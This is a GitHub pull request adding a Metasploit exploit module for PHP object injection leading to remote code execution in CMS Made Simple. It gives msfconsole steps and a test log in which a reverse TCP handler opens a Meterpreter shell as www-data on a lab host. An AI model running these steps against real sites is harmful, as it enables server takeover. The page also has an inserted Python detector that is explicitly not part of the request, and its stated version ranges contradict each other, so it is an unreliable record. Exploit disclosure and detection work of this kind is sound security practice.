
Add CMS Made Simple object injection exploit module #12529

Merged
merged 13 commits into from Nov 13, 2019

Conversation

@scanu92
Contributor

scanu92 commented Nov 1, 2019

CMS Made Simple is an open source CMS. With this CMS you can modify the contents with a pre-installed module called "Design Manager" that is vulnerable to object injection.

This module exploits an unserialize in CMS Made Simple 2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1 by sending a serialized object that leads to remote code execution.

Verification

Launch Metasploit and set the appropriate options:

  • Start msfconsole
  • use exploit/multi/http/cmsms_object_injection_rce
  • set RHOST <IP>
  • set USERNAME <USERNAME>
  • set PASSWORD <PASSWORD>
  • exploit
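As an added defender-side example (not part of this pull request or the Metasploit module): a small Python detector that flags request parameters carrying a PHP serialized object, including URL-encoded and base64-encoded forms, the kind of payload an unserialize() sink like the one described above would receive. The log line format, paths and parameter names below are constructed for the example.

```python
import base64
import re
from urllib.parse import parse_qs, unquote_plus, urlencode

# PHP serialized object header: O:<name length>:"<class name>":<property count>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z_\\][\w\\]*)":\d+:\{')


def _decodings(value):
    """Yield plausible decoded forms of one parameter value: raw, URL-decoded, base64."""
    seen = set()
    for candidate in (value, unquote_plus(value)):
        if candidate not in seen:
            seen.add(candidate)
            yield candidate
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8", "replace")
        except ValueError:  # includes binascii.Error for non-base64 input
            continue
        if decoded not in seen:
            seen.add(decoded)
            yield decoded


def php_object_classes(value):
    """Return class names of PHP serialized objects found in any decoding of the value."""
    classes = []
    for form in _decodings(value):
        classes.extend(PHP_OBJECT_RE.findall(form))
    return classes


def flag_requests(log_lines):
    """Flag lines of the constructed form 'METHOD PATH QUERY' whose parameters hold an object."""
    flagged = []
    for line in log_lines:
        parts = line.strip().split(" ", 2)
        if len(parts) < 3:
            continue
        _method, path, query = parts
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                classes = php_object_classes(value)
                if classes:
                    flagged.append((path, name, classes))
    return flagged


# Constructed sample traffic; "SomeClass" and the paths are placeholders, not CMSMS specifics.
SERIALIZED = 'O:9:"SomeClass":1:{s:1:"x";i:1;}'
SAMPLE_LOG = [
    "GET /cmsms/index.php " + urlencode({"page": "home"}),
    "POST /cmsms/admin/editform.php " + urlencode({"data": SERIALIZED}),
    "POST /cmsms/admin/editform.php " + urlencode({"data": base64.b64encode(SERIALIZED.encode()).decode()}),
    "POST /cmsms/admin/editform.php " + urlencode({"note": "Object: O:P: not serialized"}),
]
```

Running `flag_requests(SAMPLE_LOG)` reports the two `data` parameters (plain and base64) and ignores the benign values.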
scanu92 added 3 commits Nov 1, 2019
Add NormalRanking to cmsms_object_injection_rce module
scanu92 added 2 commits Nov 2, 2019
scanu92 and others added 5 commits Nov 2, 2019
Co-Authored-By: bcoles <bcoles@gmail.com>
@space-r7 space-r7 self-assigned this Nov 11, 2019
scanu92 and others added 3 commits Nov 12, 2019
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@space-r7

Contributor

space-r7 commented Nov 13, 2019

Tested on CMSMS v2.2.9:

msf5 > use exploit/multi/http/cmsms_object_injection_rce 
msf5 exploit(multi/http/cmsms_object_injection_rce) > set rhosts 192.168.37.163
rhosts => 192.168.37.163
msf5 exploit(multi/http/cmsms_object_injection_rce) > set username blah
username => blah
msf5 exploit(multi/http/cmsms_object_injection_rce) > set password password
password => password
msf5 exploit(multi/http/cmsms_object_injection_rce) > set targeturi cmsms
targeturi => cmsms
msf5 exploit(multi/http/cmsms_object_injection_rce) > check
[*] 192.168.37.163:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/cmsms_object_injection_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (38288 bytes) to 192.168.37.163
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.163:48094) at 2019-11-13 08:27:24 -0600
[+] Deleted QutroSBip.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux
space-r7 added a commit that referenced this pull request Nov 13, 2019
@space-r7 space-r7 merged commit d9b0c1a into rapid7:master Nov 13, 2019
3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Nov 13, 2019
@space-r7

Contributor

space-r7 commented Nov 13, 2019

Release Notes

This adds an exploit for CMS Made Simple versions 2.9.1 and below. The Design Manager module that is installed with CMSMS by default is vulnerable to PHP object injection, enabling remote code execution.
